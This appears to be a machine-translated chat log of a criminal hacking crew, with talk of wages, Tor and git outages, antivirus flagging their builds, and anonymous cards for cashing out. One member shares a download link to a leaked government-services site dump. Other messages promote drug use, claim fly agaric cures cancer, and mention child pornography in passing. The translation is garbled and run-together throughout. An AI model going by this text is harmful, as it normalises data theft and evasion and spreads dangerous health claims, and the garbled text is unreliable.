Russian exporters are so happy, why should they get in the way? Tell me when the dollar is 35 Melitopol our Konotop and Sumylov in the ringWhen Elroy comes, poke me with a wand... I have been taking terminators/cyborgs to organs since I drank in the morning, all day free (s)I have a pact with himWeldon, bro, you'd better quit with them snake-ass grease your vagelin, I'm not Putin)and I remember that they were good at tearing in half, were dense and you could collect animal shit. I recommend it, I've seen punched cards in the research institute, should you open a sex shop? I've seen punched cards, and that at the university, because our VC often still used punched cards) I punched cards to clean shit!And the basics on themKasets, too, I remember the tapes I saw the first UFOUltima Online )UO? also say you know played in UOI am very old)I know what is irc) correct the mistake: In the word KuevNe. Pity. yes kherson with itAnd no one knows what irc.In irc ru_books moderator for politics put pluses. If you're a clown, you can get trampers every day, we're free people):rofl:And when are the atheists?(Oh, we have shuttlecocksgood thing I'm not from this planetgood thing I'm an atheist Catholics celebrate by the Gregorian calendar and the Orthodox by the Julian, so the difference in two weeks now I understand) is like the seventh, but the twenty-fourth What is that?happy catholic christmas, by the waytx mate!:vulcan:youtara, on psi+ standsbad morozbad santa :santa:KOT they also spell hooho maser fakerPaschalk just double-checkedwhere did you see this santa?)and bots fighting today also wearing a santa hat?))@elroy hello, I have an old toad without hats and dyed eggs)On vlc also have.Oh these Easterlayer, by the way yesterday it was on my vls playerMaybe EasterlayerI also see.yesGood morning everyone)) Say, one I see a Santa hat on the psi + star in the tray? 
@angelo do not want ADATA or Samsung (I have incidentally 3 SSDs: 2 Adata and 1 Samsung + external Kingston) - take OMICRON - he has the future :grinning:@lawerence knock manuel will tell who crypto bk ?git soon will riseNew poem about "the little boy": https://siasky.net/LAACqddmKm3hW_S0ESz9Htw3SAflYbNjMDtPVsmcrx8GmQ@adam The main git lies. Pick it up please. https://0xthreatintel.medium.com/internals-of-ta428-operation-lagtime-it-3fd342404360 mbe somebody would be interested Or dlsym, but not the point> i remember on ks servers there was some kind of exploit, you send a packet and the server goes down Yes there is just a problem with linux servers related to the implementation of dlopen There's a command for spawning monsters and it looks for a symbol in a server module with the entity name of the desired monster and calls it as a function. And dlopen looks for symbols in all loaded modules including libc. You can printf on the server to call and shit in the console. a little) olskuli not changed? I teared upwww, pluginsI at one time from amxx cleaned this crap so they did not)) and again you play on dalt2If you see such ports in the cake, then try to put a new browser or put in a nearby folder Expert boundle and connect again. You know, the problem is solved instantly. They like somehow learned to damage the chainprikolno was, the map is not picked, took took put nahrennyu at servaki ks what an exploit was, you send a package and servak falls downA here on the torus by the way it is interesting. Noticed when the addresses in the ports are taken like 27015, 27020, there is no connection, always an error to them. It's probably fun schoolboys, KC servers poke fun)). The problem is somewhere in the torus. Details: 0xF0 - requested onion-resource descriptor not found in hash. Service is not available for the client.Can't complete SOCKS5 connection thenA git does not work;Hello all.@frances :thumbsup:Hello all.@all Hello friends! 
I noticed recently a sad tendency in some of our colleagues - to appear only for the WP. So here goes. Your next WP depends on my good mood and your online. If I write to someone and do not get a reply within 3 hours during working hours - I put myself a note. Two notes and we say goodbye. Raziebatyami no place here, do not want to work and move with the team in the same direction - GOOD EVERYTHING. Who if something that he does not like and what he does not agree with - leave it in person. Have a good working week everyone! - Do you see a gopher? - No... - but he is)> fuck, it's boring without sylver. he was a good politician boring......> but what about giving the pindos a blowjob? So read between the lines, you can see everything there) they have a tasty stew with their parents, if you're going to Chen, stock up on stew, just in case it's good that you're not Starshina Don't piss, next to me is Elder, 3 years with you I feel like an old man, I envy your potency:laughing:just what you need on a "man's" holidayoo, homosexuality has arrivedif you want to be ok, fuck the Baiden, every day:thinking:fuck, boring without a sylver. good politician was you want peace prepare for war but how do you give the pindos a blow job? Happy Holidays, colleagues! To all who are involved and not. But to all of us, peace. Let the bots fight, we have more power over them)): Happy Holidays, cyber troops! Happy holidays, everybody! Happy holidays Really cool stuff, sorry I don't have a windup. Watch the Berkova fight. 
Who's Bruce gonna teach her the nunchucks?what straight Mortol Kombatnu needed then Buzova with nunchakammejljet belt renvnuzhna fight datsik with aliens from nibirua renvnuzhna top vendor treshchavleny treshrentv sure that the promotion + hryunov orda there judge conchdatsik surrendered exactly chokovoy?iwho was watching the fight 😃troll them, they went to pieces of coursenod32 demolishes everything compiled under 32bit studio 2019Reporteddefender muitorrent demolishesgoodnight bro:relieved: everybody have a good weekend!good night =)good night guys all, Kera don't fuck with the monitor, fuck with a woman you should buy lsd and sit on a microdosing there is a red, there is panternyPanterny - a more brutal version black fly - what is it? I'm not Kera, I will not google our young naturalist what is it?I never doubted myself I never doubted you I know :smiling_imp:you're a fuckin' idiot good at 16 and a lad like that at 16aubene, you can't get any younger than 17Now I really tried microdosing on myself - the subject is normal. More batch ordered, including panthernogolstaet social network likeeechild pornography what is it? By the way, about fly agaric `https://siasky.net/BACSctoC-D9TRrvegFxE3qbtY3njsBC6Mb995zDaN0vUAQ` look? look at the bitches 18ih And pornohutam girls are good yeah i just tiktok to sleep fuckin' rent-tv site i will go when he alone remains on the whole runetenu fuck, Tinkov because ren tv has a site> i do not watch TV with Fuck, you're not like everyone else2010 after my link everyone went to try I guess I don't watch tv or any other trashakdatsiks who watch fights on ren tv? don't remember who wrote that if men learned to suck themselves, then women were not needed But I really wondered if you have a fuckin' reference book there https://www.intimshop.ru/sex-faq/masturbaciya/kak_otsosat_sebe_soveti_po_vip.html I'd like to smoke an Indian peace pipe, they say it's a good stuff. I like adrenaline better, it's good for the nerves too. 
I'm for cannabis, I ain't never seen no fights on kumar. Misha's reel for booze - no hangover in the morning. After it, there's not as much aggression as what you said... It's better to get off your chest or join the Communist Party if you're prone to schizophrenia, you might end up in a mental hospital. Everything is relative. Cannabis is supposedly useful, they say, it presses cockroaches in your head and you'll fuck up, say Chelyabinsk cops. I'm coming back once in the evening.., I'm high on hash. Life is beautiful. And insanely good.The worst thing that can happen is to get our correspondence to the krebsuble, the cord knew how to do bullshitKatuha Mishin from all sorts of diseases, fly agaric from nevras, sodium thiosulfate - from if modeling climate grab where the fuck, I looked at this Epifantsev, fuck your fly agaric. https://www.youtube.com/watch?v=p8H73LJDClc What if the cuckoo had gone away ? I wouldn't feel any side effects - I just don't give a fuck all of a sudden a bungee jump would calm me down What if the cuckoo were gone? Am I sober? I'm not pissed. I tried it - the cuckoo really calmed down. Everybody eats it and sells it dry. By the way, why are they all hooked on fly agarics in Ru?It's a pitta glass Why are they all drunk? cancer is cancer, not cancer, cancer with his money Jobs also has a lot to say and all the talk is about whores, thrash and drugs) love it and here come the drugs again and hello! i like drugs again...go on a microdosing of amphitamine salts, cyber athletes do it for a reason. i know a lady i know, she's curing her cancer with fly agaric mushrooms... she seems to be successful.no they would have pulled the ms for monopolies or what ker and you sleep at all ? de'bill g(x)atesstiv uyobsi in eugenics gates is not yet he is dead already and steve jobes threw his buddies for 500 bucks will not open a bottle of beer with his eyes ?he's not fed up with the wind? he didn't grow up in chelyabinsk? so what's his beef? 
he's a sly glasses-eyed mother's boy, not a computer genius. at least he's not bullshitting that he's a citizen and he didn't rent tic-tac-toe that he had money? he was the son of rich parents, and he didn't even write DOS, he bought it from someone. what's the charge? i was thinking about her ! there is a connection )) yes i see it )you can connect mr. s with american insurance companies, not with dithyrambs, but with the fact that billy is a rich man's son, and he didn't even write the DOS, he bought it from someone, and they really connect some random events I like your brevity ) i am fucked if people have time for it i could drink a beer with you :D it's Kehr's favorite topic )fuckin' dithyrambs there, but also about gates connection with the Rockefellers, about eugenics and wanting to put everyone under control, even crazier is the idea of not chipping, eugenicsaaaa, I did not watch that, but I condemn it lolroll about chipping or what?Why Ker ?who essentially lobbied for his interests in the business community, well you're nuts of course and not a word about the parents again@Ruben and what is there to watch ? the link to the page @kermit tell me exactly why it's not a question of dispute), there was a "request" to wrap all the links in tags ...and why should I wrap them in quotes?Why do I put it in quotes? so it won't be highlighted? Ruben put the link in quotes. "D. Corbett - A success story or the crown of windows for everyone" -- about bill gates: https://siasky.net/CADtRTm-lZhGqrh06bI-kruFsxz7gHbgw9IPodqTcRQeaA where are your long-winded dialogues, that's better than the May sun to me! that's it?! 
and you all have a nice weekend) pongpingposting a few hours ~ one hour@demetrius write a question there and backthere's a good mornin instead of hercules for the morning drugging ?and slam the door correctly answer, like "both" =) yep think about what I've lived to: Belladonna's son Took me off with his "good morning" as if I was a button monger!I didn't really add it =)or maybe you want to say good morning to everyone =))) - What do you mean by that? Just wish me a good morning? Or are you saying that it's a good morning - no matter what I think about it? Or do you mean that everyone should be good this morning? now I used it to check the sijumars -- It's working, I got it) my web site won't opengit, I mean.I just pulled, pushed - everything is fine. @all does anyone here have a poppy? no one has had problems with updates of the os? and the torus rakes up the zbs, then the error 502@thomas somehow through the ragit works for anyone? @rubenmars at the input seems to have diedBitch meBoys, and who AV farm maintains? AV updates, etc. Need advice) Roskom screws up the connection...You can try to wrap a tor browser through a tor, indicating the bridge in your browser. 
I tried different bridges, it didn't help. On my tablet and my phone, same thing. All of a sudden, I'm connected. Hi.) So what wasn't working? Browser doesn't connect? git from the command line - works.I wanted to commit to git already with a comment like 'sos'.Hi. I've got git working :vulcan:git sometimes glitches write git to adamperl Hi there,is git working for you?:metal:good morninghoroshofrans is waiting for the bossI'm out of vps and bitsGive me 10 vps pleaseHiThis is from another cult)and your crypto kosh will be filled to the brim with bits and bytes of your ssdsh !from bugs and lag, admins crashes and tora tupeniya, amen:D░░░░░░░░░░░▄▀▀▀▀▀▀▄░░░░░░░░░░ ░░░░░░░░░░░░▀▀▀▀▀▀░░░░░░░░░░░ ░░░░░░░░░░░░▄""""▄░░░░░░░░░░░ ░░░░░▄"""░░░""""""░░▄"""▄░░░░ ░░░▄""""""░░░▀▀▀▀░░░""""""▄░░ ░░▄""""▀▄"""""""""""▄▀"""""▄░ ░░"""""▄""""""""""""""░"""""░ ░""""""░""░""""""""░""░"""""▄ ░""""""░""░""""""""░""░""""" ▄""""""░""░""""""""░""░""""" """""""░""░""""""""░""░""""" """""""░""░""""""""░""░""""" """"""░░░░░"""▀▀"""░░░░▀▀""" """"░░░░░░░"""░░"""░░░░░░""" """▀░░░░░░░"""░░"""░░░░░░▀"" ▀"░░░░░░░░░"""░░"""░░░░░░░░"▀ ░░░░░░░░░░░"""░░"""░░░░░░░░░░ ░░░░░░░░░░░"""░░"""░░░░░░░░░░ ░░░░░░░░░░░"""░░"""░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ ░░░░╔╗║║╔═╦╠╗░░░╔╗║║╔╔═╔╗╠╗░░ ░░░░║║╚╣║░║║║░░░╠╣╠╣║╠═║║║║░░ ░░░░║║═╝╚═║╚╝░░░║║║║║╚═╝║╚╝░░ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ ░░░░╦╔═╔═╔╗░░░╗╔╔╗╔╗║║║║╦░░░░ ░░░░║╠═╠╗╚╣░░░╠╣║║╠╣╠╣║║║░░░░ ░░░░║╚═╚╝╔╣░░░╝╚╠╝║║║║╚╝║░░░░ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ our angel is not like that - he will not spoil girls for oriflam) I do not know you, but I will shave you. 0_0t's the one I wanted to put on "puking farther than I see, I piss farther than I hear, am I not an ANGEL? 
😇")Anyway, if you've seen "Perfumer", there's a scene before the trial when they take Grenouille out and the priest shouts "that's an angel" and then the orgy starts There's an alternative web-mode to YouTube without ads and with a "download video" button - openyoutube.net there's no less trackers there, it's better not to, or else he'll get angry (well, I doubt it, you can remake "steamed lightly") for a link to sylver will not kick you in the pants? actually, with me is very funny :rolling_eyes:koolstory in the style of Jean Paul Gaultier)throwing up further than I can see, i piss farther than i hear - am i not an angel????:innocent:i'm trying to remember the most harmless ones =))aahahahaha )) i even pissed on the policeman, remember - remember the waiter threw up caviar once.and almost always for every shame, ng + booze = history in the life of the story you just did not fall asleep in the car with him, he would not have cared about your color) nooo, we were blue, but not blue, so the four of us cabbies spielly-wielly:grin:I'm ashamed also at first thought: "with a client, or "I thought it would be different ) You have not had sex this year? Seychaz will do it :Dblin))) @angelo I remembered a student's story, New Year's Eve, about 20 years ago) i celebrated the nouveau at a classmate's place, got drunk, took a taxi, and went to see the girls, the cab driver was, wow!, a Georgian or an Armenian. asks us; - Which one of you had sex in this shit??? we don't say a word, we can't catch up... he..: - I've had sex this New Year! WAH! we laughed like we were stoned with a weighty gas):grinning:love story from Tallinn-it's a fucked-up story in general)))) what a sad anecdote (Two estonians are talking: - Well, it's New Year's Eve soon, it's a good holiday! - Yes, it's good, it's almost like sex! - Yes, but still sex is better! - I've had such a guy in my life, he won't even remind me how you pissed on the policeman at 16. 
It's better not to drink with him, he won't forget anything - he'll remember it all his life later on.Like ElectronicsHammer is right on his word, but it was a long time ago and it's not true, so you have to clarify again. those agree on how to work the main message - those who work on active projects, they work till the 10th in vacationSilver wrote, but what exactly need to clarify by the way bosses did not say how we rest?@jaime - Blue Water Tiger - symbol of 2022 (Blue is considered one of the most fickle colors in the East, which means we need to be ready for changes))))))@angelo *_not have 100 friends... but have all enemies_* :rofl:=)Weldon is trying to find a friend And tigers, too? :(And what is blue? @angelo and you send valentines in advance?) Do not worry, you will not miss it! Well, the year of the *blue tiger * has yet come:grin:@rocco take for repairs from us) "▀▀▀▀▀▀▀▀▀ ▌░▄""▄""▄░ ▌ ▌░"""""""░ ▌ ▌░░▀"""▀░░ ▌ ▌░░░░▀░░░░ ▌ "▄▄▄▄▄▄▄▄▄ I thought they blocked something We owe it to you...let's stay!!! Praise the great Fixer !on the server glitched all fixedBrothers, how is your rocket behaving?@all who did not get the WP - report in personHi, I will connect late today, 16:00 MSK they got it twisted there, you wouldn't understand it`http://securitylab.ru/news/529632.php`)maybe a screenshot ? `quotes at the bottom` `https://www.finanz.ru/novosti/valyuty/vladelcev-kriptovalyut-otsledyat-i-zastavyat-zaplatit-trillion-1031172650` is it how? in tags, please! 
https://www.finanz.I also like PZH very much, I'll ask to add it to the protocolIt would be nice to return the settingIn previous versions of rocketchat before the update it was not necessary to confirm the interlocutor, and now it would be necessary to raise it...The OTR is not an encryption of the online session, it's the rocketchat account that catches the connection, it may not be visible to the eye + change of IP to happen timeout is if the interlocutor does not have time to confirm the start of a personal conversation OTR timeout often gives + otr often breaks by timeout when you try to connect da it's a pity. otherwise we could have burned the conspiracy theory and the mysterious insiderrepeley Shura, drink!!! But I'll try to finish autoconnection OTP just had a chat with @demetrius e2e - all encrypted, it means there was a bug, God bless America I love power, I love the FSB sleepy Joe reads Don't panic, everything is normal, just easier to read by SBU and FSB.@benny can you show me an example of an open message? I do not panic, but ask colleagues to conduct an experiment in my place...@rocco @demetrius colleagues urgently need to return the automatic confirmation of the inclusion of OTR in this rocket if so it's bad very((without negativity always thought that fans of e2e is not quite adequate)) well zbsdaa otr normal vorkat? bug or a bug..with enabled e2e encryption in ls `This room's encryption has been enabled by benny` I don't understand `test test test` I was surprised at this shit: `This room's encryption has been enabled by benny `that e2e doesn't work what's the question? 
2 absolutely different techniquenu clearly, that either e2e, or otrego do not need to turn on when you need otrya above described trabble from the LS when you turn on e2e your assholes krojuvot see, in General pussy and tits and ads in the LS work correctly, you need to turn it off when e2e otre does not ploughelo, in this channel, in @general is plain text - plain text can it some lag, so asked you to check yourself ....! would not be superfluous! and i'm saying that only enabled OTR - shows `{"$binary":"QXYwryQ4qJxWLGnrLZVZNfu976xOf/iEtG3Er78fmBVICptEKT4hutCKncLXoH8z5ll/Ue2AloeMjkRA/UcW9iRfNqKmQqip6XNLeqNKAgBDZWiXJpjUbG8bwi69wiqzF8M7Sc/SWFn3XI/PqPYry9AAce5Ig/NXi4VehICMUmkg+drSaVK3I1rGEBktT7f0X6MopQPDgj0NnC7qWI3sIAHitCpI00D2u58vEP/BzIimlnKg8Nl2zt41XoU/fDtb7roJ28WEKtb8mxG4weiud2PjcA/3I7ag9IZxJTXX5NyKMHxOmq7c+G+jWlr6wb0Orz4Qq4JNgsUvahOCNOzk194LvXECJ0hYdA3yjmx7SY6ZOGOsw2BTIg=="}` let's say at geralA here, by the way, what's the deal with encryption in individual chats?I forgot to tell) when you turn on e2e - goes in clear text *It seems that with direct message correspondence goes in clear text@all Gentlemen, look up your thread when you use *direct messages* in the rocket, just found out that the correspondence goes in OPEN TEXT, and only otr encrypts it! Reply from 77.88.55.70: Byte number=32 time=10ms TTL=53 Response from 77.88.55.70: number of bytes=32 time=11ms TTL=53 Response from 77.88.55.70: number of bytes=32 time=11ms TTL=53 reply from 77.88.55.70: number of bytes=32 time=11ms TTL=53thxquickly let's look into it@benny still the same, 502 that pulls that when trying to just go in through the browser@homer, cooing git? there script, should let go..gitlab is sick? 
502 shows it got better write it down, I'll keep on shamming you pioneer rules FireFox assembly files *`moz.build`* ??? so I can torment questions @allen and @black :relaxed: wonderfully :face_with_hand_over_mouth:for him already answered)there is also something about Sevastopol ...)so talk ...(c) I also speak fluent English.yet irrelevant, thank you??? what are you wishing me? I do not understand a fucking thing) with an accent?) 
@silver I speak fluent English, Pavlovic comes out of the old guard k_plenet, there is an interesting fate of Skript, instead of term, book and yu_channel, in politics and a member of the Odessa City Council ......and I realized that he can not attach the file I thought he was talking about something systemic) and sits donates to collect for a lawyer))) Thomas, what else su&)) he was talking about the rocket, aha, or a process to run ssuprocess, buy the book "subscribe to the channel, say likes"?) yes bullshit, to subscribe to him) I'm tired of listening to Mario go rob the bank thank. According to Pavlovic, the night before, when he checked into the hotel, he somehow "rang up" in the database. The police came to pick him up, but before taking him to the station, the officers allowed him to finish his meal: "all by aesthetics." At the station he spent some time in a cell with people who were not very nice to him, and they took his belt, watch, and shoelaces off him. According to the hacker, after a few questions from the prosecutor he was released. "Alive, healthy, at liberty, enjoying a little bit of cool St. Petersburg air," he wrote. Pavlovic also noted that he is wanted since 2007, and now he is solving this issue with the Americans through a lawyer. What does Pavlovic himself say? Can someone say in two words...Technically everything is correct, but in fact it is mockery if they take someone like Pavlovic, who has been imprisoned twice, and then release him and he leads video clips, the Americans will not see this, but we will see Transom no longer, there are no more attacks on america and will not be in the foreseeable future from free miners, which means that we will be pinched and instantly the entire cyber underground goes underground. if they catch someone unknown to date on charges from Interpol in a high-profile international case, it is one thing-they love a multi-track operation.. 
they need to show the americans something, and to understand how we would react to it? that's how interesting the authorities had to get up to speedPatrick, I do not think that's "the plan", we'll deal with it... try it through sudo, what? write us the outcome of what he saysNow he's released, he's seen the stream, saysScheiße(it worksjabber status? try it through sudo if it passes then check the rightsAha) marked money in a bank account )) And the coupons marked in the wallet. How??? but who works in the rouge, they come to him in the morning, like a cool scheme@all who has free English? `https://habr.com/ru/post/586612/` these nlp-callers can not think of anything) I can not add a file to the private channel, writes EACCES: permission denied, open '/tmp/ufs/tobmRoDSwFNGRko4J' is this how it works? https://www.justice.gov/opa/press-release/file/1445241/download Page 27 :grin:Who wrote this? Dontsova, winking sinisterly and rubbing her hands together, "He's capable of anything. That's the kind of man we need," the members of the hack group wrote. ahahahPavlovic is ours in the broad sense that he is our son of a bitch shhhhhHave you got someone from ours?)look at Jakubts) he's a wontead with a price of a million per head, looks like a fuck off to the pile `https://xakep.ru/2021/11/01/trickbot-member-extradited/` Not an understandable situation in general. Look, here's the hacker, we'd give him away, but we can't. But we'd really like to, as we promised at the meeting. Pavlovich would not spend long in police custody, about a couple of days, during which the security forces would conduct a pre-extradition check. Then he would likely be released, since Russia has no extradition treaty with the United States. We'll see how it ends and they also banned `codeby.net`, they position themselves as re-servers... Ours were negotiating with the americans, yesterday there was information that we handed over information about some hacker. 
It seems that this is the result of negotiations. `https://www.interfax.ru/russia/800909 `link to the news link Pavlovich was taken in Petersburg Interpol 0_0 I have a third day of problems with the browserTore loading error...guys, and pops up at anyone error in the Tore - PR_END_OF_FILE_ERROR ?oh man :(@jaime just yesterday with you talking about covid, today my neighbor's mother...package duplicated :)pongponggotten 30 minstat, tin that requires a passport when the card is already issued, I have a different patronymic (in their database) from the passport, the card only name / f-yada okay, the planet... in a black hole let's settle)just dibs not man's stateyou need a planetDa will be so! I also suggested my own power plant, but they told me straight out that the accounting department would not approve it :grin:I re-read it: we came to the conclusion that we need our own bank. Guys, how to live without you))))`https://memepedia.ru/s-blekdzhekom-i-shlyuxami/`jokingly ok0) that the bankers face the first thought?))) Just like in the movie "Scarface" All! We need our own bank :partying_face: at best, can come with a desk check at the address?as for tink - I already wrote that they "ahead of the locomotive" write off what you can do? so even from the account of a sole proprietorship transfer all the same, as I understand, be a beaver, provide the contract will be from the account of a private entrepreneur / legal person to make transfers for example, and there is a commission all control reporting, etc. for what merits will they raise the commission if their transfers will fall off in the first place?? 
According to the principle "if oil is cheaper, benz increases in price"?but that was before it was possible to order a card to the post office before the demand - they do everything you can - SPB, direct fast payments from individuals' cards this control, if it will affect exchangers first of all - they will raise the commission I used to make an advkash with a painted passporttin kof when receiving the passport asked advakash as well as with tinkov a bank representative came in a car and recorded the passport data, so I do not see the difference therepashport) and how does the verification happen?do they make a named one is it named? tinkoff black also has nothing written on the tinkoff black card, but it is received by passport I did not even have time to use it when it was blocked because advcash stopped cooperating with that bank edkashvoda as advcash project is scandalized by taxation....i used advcash not so long ago, i bought it -- the name is not even written on the card, but it was issued by some raskobank, a "resident of skolkovo" sevav rb, it's very wary to use them now, the only way to solve the problem is to buy a nonnamed card from the bank, like advсhripta->local exchanger.mda(160-something countries signed the document on the exchange of information and their banks, by the way, since about 14 years they inform our banks about the accounts of non-residents-I remember this old-fashioned way ..... I remember this old-fashioned way ... You cannot go there, and who do you open it for - the old-fashioned way to get a card in the EU ... so what to do? They should buy the card from the old ones and then what shall they do? No, it seems to be hot news. If it is true, the withdrawal to the left Sber cards will be over But if he is serious, he says there will be no such thing))) The Central Bank is a man of his word and he takes his word back.I don't know how to get the money. it was like that. 
has anyone heard about the new law since January in the russian federation introduces control over the movement of funds between the accounts of individuals? and when you export 16 I got into 30 with the winDo you have a linker hanging up, even with the beta> who had VS 2022 installed / used? We did, we used it. Collected files somehow do not work> I have space under the VM 50 GB, dz will not put like that Download offline... At 50 will stand up, depending on what you're going to put)at me is, all normal, I do not dare, because I remember the first experience with win 10, the first reboot after installation and into the loop :))))))I know a friend put 11 as soon as it came out, mate sat there I have on a virtual machine who has win11, I have space for VMs 50 GB, I do not know put like that?) and how she behaves on vin10 by the way dakto VS 2022 put / used? Franz they are kidding so badly behaved current 2 weeks what does it mean for what month Santa Claus does not send gifts?(we need his grinch from Santa "presents" will not be?) and then Franz extinguished) and this wages for what month? do not DDosov) not all at once))) Populars, who sends wages in person kosh> We - the horror, flying on the wings of night!!! We are the horror, flying on the wings of night!!! But our days are all long, because night is our day in commerce maximum short daynet31- work Well, if it's seriously a day off or not? It's not a day off everywhere, so I asked it's okay. Get ready for New Year's Eve with a glass of whiskey. Wednesday, Saturday, today we work all days beginning with C. The enemies don't sleep and of course the first. A 31go we have a day of work or not? Cat cracked a joke (well, February 30 day does not exist as it would be)) Hz). I personally did not understand where the joke and where the truth), and January is that, will spend in anabiosis?) No, well, everything happens. (It's just an academic joke...)). I was asking about December 30) Uh-huh, until February 30. Hi. 
And we still have to pay on the 30th? I did not hear about this kind of fraud in the RB) "Here it is, the digital struggle) "Now they hack into government enterprises, encrypt them and download them. In return, they demand to release politically exposed persons who are not too lazy to dig the code, look for holes and try to do something)). In reality, maybe the rest of the functionality still works It's true, they have a good go at the DB, at least it says so on the main page The site is down, Penza is closed, I think they have jammed it and will not open until they fix all the holes in it. video, wiretaps, etc..Is it realistic or passport data can be replaced with TIN, like Vasya Pupkin for Petya Taburetkin? How realistic to replace the information in the database pidarasym I sms came several times to the phone with the authorization code judging by the fact that when they started a madhouse with the voting, they started to hack everyone But I did not watch so far as I understand the state services passwords in the database are generally stored in the public domain Well, what passwords such and security as education - so and Education Minister :):grinning:password 11 login was admin there was access for the Minister of Education of our region and so onCome on, we have enough sloppiness, but do not forget how they sold a laptop from the U.S. Department of Defense on Amazon with classified information of students, students, a bunch of passport data There was (or still is) a portal that was shared access) without passwords when I worked in education was one interesting thing.all these state resources must be a madhouse with security. 
probably no one will even say anythingPutin will probably "punish" everyone for this) when you dig around, tell me what you hope to find interesting I downloaded it overnight) ok, it will take 9 hours to download it) `https://anonfiles.com/vbX2e5Wew9/gosuslugi.pnzreg.ru_rar`test` txt Forgot how to wrap the link?)There was a link on the hbr, through it you can get to the fileYes, the entire folder is a legal porn...@homer and what link downloaded? And if pdf and the like, what's there for 7GB ? three pasmorty and a roller porn? there pdf doc, etc.Most weighs the folder .git and folder with the download documents as pure engine, the database has not found______█████████ ______"▄"""""▄ ______"▼▼▼▼▼ _____""▌_______" ______"▲▲▲▲▲ ______"""""""" ______ """_____"""bitrix )))) saw something familiar, I haven't really looked at it yet...)) And who has looked at what is leaked there? There are only sorts, there is no base, right? Check out this one: sandisk extreme portable ssd v2And I haven't gotten to usb 3.I like the way Intel 760p works, I wouldn't say it's too hot, but it's not scalding and it works without a radiator, it's enough to work with, i like the Intel 760p i can tell it runs like crazy, even though it is very warm, it doesn't burn, it works without a heatsink, it's enough to run. any flaws due to temperature i haven't observed any read/write speeds they have. the corsair ssd 980 pro is good in speed if the M2> M2 SSD NVMe and M2 SSD sata in the case which is connected via USB-C ?) Is USB-C 3.0 or 3.1/3.2 ? Sata has a theoretical speed of 6 gbits, max. When nvme will be 10 gbps, but there is still very important! 
controller, ssd itself and of course the hardware pk.Totally need a specialist in hardware. bro, where are you?))) question is the difference in speed, between the M2 SSD NVMe and M2 SSD Sata in the case, which hooks via USB-C?) option with the case also considered, but went straight to the ready external. my thoughts are elsewhere) just think about buying an external SSD, that's what I think if it will cling to as USB-C what betterThunderbolt with this beast from the reviews only know. samsungs looked external, speed 40gbits of course the plane is still that. but for now I'm happy with my ssd, what you need from it performs and okIn early 2021 Intel representative said that a new Thunderbolt 5 interface is already in development, the expected speed should be 80Gb/s (10Gb/s), that's twice as fast as Thunderbolt 4 and USB4 interfaces[34].lucky you have it, i don't have it *Thunderbolt* who used it? how much faster than usb 3.2? the hard drive is the hard drive externalcotlichno, i will try it, so i did not notice, everything was fine *hard drive ssdish* - who is the it??? rhino + bulldog? i don't know about the speeds there in the difference tayp c is also there straight flies ? but true, USB Type-C i used both on my laptop and on the external ssd slags are there ?on the external ssd system put + virtuals on the same, works fine for 3.I would have thought i would have done it with a case and external one or better sell the new one and just buy external ssd harddrive. Is there a reason ssd nvme throw to external hard drive on usb 3.1 ?> Or on disks from china to order yyyy) `who here writes in python? I write from time to time. 
But the depth has not had to be measured) hi hello lawerence apparently it's not me who has the problem, I read the "zapil" and then refill it, then reboot myself and that's better than the reset button, then keep running it through your head and the necessary stuff flies by and you remember a lot of shit that is not necessary before there were less surrogates, why the fuck would you want to fuck with the chip to increase memory? It was a Johnny Mnemonic to ride in a car without navigation and find each other once beforehand once agreed with a man to meet somewhere, a biohacker was alone, he sat on ahms for yearsxxz, before it was cunt without devices maybe there also zeros and unities in the encrypted view need a unified theory of everything, lol I want to see the world as described in the Ij dmitry rusad no secrets there fucking we know how to dig into the body1. Biohackers do all sorts of fucked up things with the body)) 2. Where did neurons come from? - studied the workings of the brain. angelo, everything is in process, you will see soon in the brain ad, bear with me)))and what is the main secret - the brain in what principle ap?i'm not talking about fucked up, i'm talking about the body, we've already fucked it up a lot more and it can also reject the "foreign" body, you can't fuck with the body, you can't do anything with the body as it would be cool to do. Being able to count memory, being able to send video signals to the brain's neurons directly without our current crutches.
That's what green tea brings to mind at night, but I'm thinking about vodka. I wonder how long it will be before we can understand how memory works in the human brain and how it is deciphered/recorded and rewritten. We know so much about the human body, so much we can do with it. And most importantly, the brain is a mystery to us. That's a shame.you should have triggered@angelo I said the word "vodka" and 100 grams of vodka, now you would have had soup or borshchik above some gastro-sadism:zany_face::imp:i myself add access to the repository i don't know how to add or in tropico game zivvu should be addeda if two wrong moves two missiles will fly one wrong move with african whore's mouth with dick in some fucking uncle's mouth it depends to whom and depends whowhether continental ballistic missile you're thinking of leaving one head with a life connection, a 10 kopeck coin slot, and the inscription 10 kopecks - 1 hour minicab on the forehead?i'm thinking about sexual pleasures after the meal :rolling_eyes:and you're thinking about eating, what are you thinking about? kermit tell him ! fuck, but it's a functional part..... it's very important not to fuck him up first i like to apunt him for rational use of resources !but the functional part is !apunctate it hardwhy waste the goodness of the whole thing and in fact you can apunctate the legs+++yes, fuck it - i like cholodeca with mustard from your whoremongers, We'll throw whole pieces of rice in it, for the pilaf, we'll get some cumin or fat assholes?I need some more carrots while I cut the onions. Who's got a big cauldron?*who had the whores there? 
so sekshnado choose who to eat firstpipeda how urgent, how many balconies are hanging over his head, and the ice is everywhere, it's unlikelyDelete the patch) urgently remove from the release!Fuck, that's right Somewhere he did not have time and allYou wrote "Harnie his bot until tonight "angelo, you misspelled the scriptWe do not know if he is alive or not, so too early to say, I'm for his health did not reach prayers) @frances know I prayed for you!) He even works?) Has anyone tried it? Like there beta, designer for developmentPlus in opsianii written that it may not workThere's something unusual on the back side of the physical switch to turn off the camera, wifi, etc. There is a doc, schematics... This is all good, but here in the same docks, iron update: added pull switch, now wyfay not turn on by itself)))) 400 bucks a Gorila put 4uyuThere are not only kdeKastomny phone with linux and kde mobile like the Chinese. Yes it seems all the same is not without blocks.Tolko do not drop the background take what the hell is this? They recently rolled out a fresh smart, glass screen and stuffInterestingly, has anyone tried a pine phone? ah, maybe like this...fuck it, fractalsTo make beings live there too and create a new matrixTo not workWe all live in a matrixWhat's the point of looking for the point?) It doesn't exist anyway)And why think about it... about the meaning of life ahahahaI either went to sleep or to workthinking about the meaning of lifeNorm talked to each othera Why are you so quiet on the device above his picture and dough to shower a voodoo dolla I put a candle for all of youI have a wife praying for Silver his health>>I have a wife and this thing's for a change. I've got a wife and we're praying for Franz and his health. https://www.fleshlight.com/products/universal-launch-landing?locale=en ``` vr maintained not, silence whileFranz did not show up? 
